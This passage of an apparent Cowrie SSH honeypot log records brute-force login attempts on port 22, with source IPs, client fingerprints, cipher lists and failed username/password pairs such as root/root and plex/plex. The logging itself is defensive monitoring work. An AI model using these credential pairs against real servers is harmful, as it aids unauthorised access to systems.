hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:09:31.514422Z","src_ip":"185.93.89.7","session":"827243331a02"}
{"eventid":"cowrie.login.failed","username":"index","password":"654321","message":"login attempt [index/654321] failed","sensor":"my-vps","timestamp":"2025-08-28T09:09:31.551747Z","src_ip":"185.93.89.7","session":"827243331a02"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:09:32.581720Z","src_ip":"185.93.89.7","session":"827243331a02"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":57950,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc45910169d1","protocol":"ssh","message":"New connection: 51.79.164.132:57950 (1.2.3.4:22) [session: cc45910169d1]","sensor":"my-vps","timestamp":"2025-08-28T09:09:37.858018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:09:38.186682Z","src_ip":"51.79.164.132","session":"cc45910169d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:09:38.187422Z","src_ip":"51.79.164.132","session":"cc45910169d1"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T09:09:40.133682Z","src_ip":"51.79.164.132","session":"cc45910169d1"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:09:41.508525Z","src_ip":"51.79.164.132","session":"cc45910169d1"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":39142,"dst_ip":"1.2.3.4","dst_port":22,"session":"691663f54271","protocol":"ssh","message":"New connection: 185.93.89.7:39142 (1.2.3.4:22) [session: 691663f54271]","sensor":"my-vps","timestamp":"2025-08-28T09:09:56.635121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:09:56.658953Z","src_ip":"185.93.89.7","session":"691663f54271"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:09:56.659710Z","src_ip":"185.93.89.7","session":"691663f54271"}
{"eventid":"cowrie.login.failed","username":"index","password":"master","message":"login attempt [index/master] failed","sensor":"my-vps","timestamp":"2025-08-28T09:09:56.856295Z","src_ip":"185.93.89.7","session":"691663f54271"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:09:57.876846Z","src_ip":"185.93.89.7","session":"691663f54271"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45918,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7ea92685cd5","protocol":"ssh","message":"New connection: 51.79.164.132:45918 (1.2.3.4:22) [session: f7ea92685cd5]","sensor":"my-vps","timestamp":"2025-08-28T09:10:04.722092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:10:04.787510Z","src_ip":"51.79.164.132","session":"f7ea92685cd5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:10:05.681594Z","src_ip":"51.79.164.132","session":"f7ea92685cd5"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:10:07.446874Z","src_ip":"51.79.164.132","session":"f7ea92685cd5"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:08.841522Z","src_ip":"51.79.164.132","session":"f7ea92685cd5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47534,"dst_ip":"1.2.3.4","dst_port":22,"session":"10ff3ca3f70a","protocol":"ssh","message":"New connection: 185.93.89.7:47534 (1.2.3.4:22) [session: 10ff3ca3f70a]","sensor":"my-vps","timestamp":"2025-08-28T09:10:21.630221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:10:21.634567Z","src_ip":"185.93.89.7","session":"10ff3ca3f70a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:10:21.650420Z","src_ip":"185.93.89.7","session":"10ff3ca3f70a"}
{"eventid":"cowrie.login.failed","username":"index","password":"1234","message":"login attempt [index/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:10:21.715408Z","src_ip":"185.93.89.7","session":"10ff3ca3f70a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:22.746211Z","src_ip":"185.93.89.7","session":"10ff3ca3f70a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54830,"dst_ip":"1.2.3.4","dst_port":22,"session":"b28701fc97e2","protocol":"ssh","message":"New connection: 217.72.205.35:54830 (1.2.3.4:22) [session: b28701fc97e2]","sensor":"my-vps","timestamp":"2025-08-28T09:10:25.356950Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:25.358155Z","src_ip":"217.72.205.35","session":"b28701fc97e2"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55196,"dst_ip":"1.2.3.4","dst_port":22,"session":"41fb3163dc9c","protocol":"ssh","message":"New connection: 51.79.164.132:55196 (1.2.3.4:22) [session: 41fb3163dc9c]","sensor":"my-vps","timestamp":"2025-08-28T09:10:31.481236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:10:31.901848Z","src_ip":"51.79.164.132","session":"41fb3163dc9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:10:31.916453Z","src_ip":"51.79.164.132","session":"41fb3163dc9c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T09:10:33.585804Z","src_ip":"51.79.164.132","session":"41fb3163dc9c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:35.093926Z","src_ip":"51.79.164.132","session":"41fb3163dc9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:39.140438Z","src_ip":"212.227.125.160","session":"040b118b7645"}
{"eventid":"cowrie.session.closed","duration":180.5431263446808,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:39.144963Z","src_ip":"212.227.125.160","session":"040b118b7645"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57500,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbcb30375b8c","protocol":"ssh","message":"New connection: 185.93.89.7:57500 (1.2.3.4:22) [session: fbcb30375b8c]","sensor":"my-vps","timestamp":"2025-08-28T09:10:45.994324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:10:46.012228Z","src_ip":"185.93.89.7","session":"fbcb30375b8c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:10:46.045565Z","src_ip":"185.93.89.7","session":"fbcb30375b8c"}
{"eventid":"cowrie.login.failed","username":"index","password":"football","message":"login attempt [index/football] failed","sensor":"my-vps","timestamp":"2025-08-28T09:10:46.115212Z","src_ip":"185.93.89.7","session":"fbcb30375b8c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:47.134877Z","src_ip":"185.93.89.7","session":"fbcb30375b8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51296,"dst_ip":"1.2.3.4","dst_port":22,"session":"2548d0a65c16","protocol":"ssh","message":"New connection: 212.227.235.229:51296 (1.2.3.4:22) [session: 2548d0a65c16]","sensor":"my-vps","timestamp":"2025-08-28T09:10:52.960492Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:53.213995Z","src_ip":"212.227.235.229","session":"2548d0a65c16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41366,"dst_ip":"1.2.3.4","dst_port":22,"session":"952f55484244","protocol":"ssh","message":"New connection: 212.227.235.229:41366 (1.2.3.4:22) [session: 952f55484244]","sensor":"my-vps","timestamp":"2025-08-28T09:10:53.464448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:10:53.465619Z","src_ip":"212.227.235.229","session":"952f55484244"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:10:54.980173Z","src_ip":"212.227.235.229","session":"952f55484244"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:10:55.748406Z","src_ip":"212.227.235.229","session":"952f55484244"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:10:57.002238Z","src_ip":"212.227.235.229","session":"952f55484244"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":41770,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e7767853a6","protocol":"ssh","message":"New connection: 51.79.164.132:41770 (1.2.3.4:22) [session: b9e7767853a6]","sensor":"my-vps","timestamp":"2025-08-28T09:10:57.649364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:10:57.799985Z","src_ip":"51.79.164.132","session":"b9e7767853a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:10:58.360979Z","src_ip":"51.79.164.132","session":"b9e7767853a6"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T09:10:59.399727Z","src_ip":"51.79.164.132","session":"b9e7767853a6"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:00.972127Z","src_ip":"51.79.164.132","session":"b9e7767853a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36402,"dst_ip":"1.2.3.4","dst_port":22,"session":"07c6804ee6cb","protocol":"ssh","message":"New connection: 212.227.235.229:36402 (1.2.3.4:22) [session: 07c6804ee6cb]","sensor":"my-vps","timestamp":"2025-08-28T09:11:07.254137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:07.254852Z","src_ip":"212.227.235.229","session":"07c6804ee6cb"}
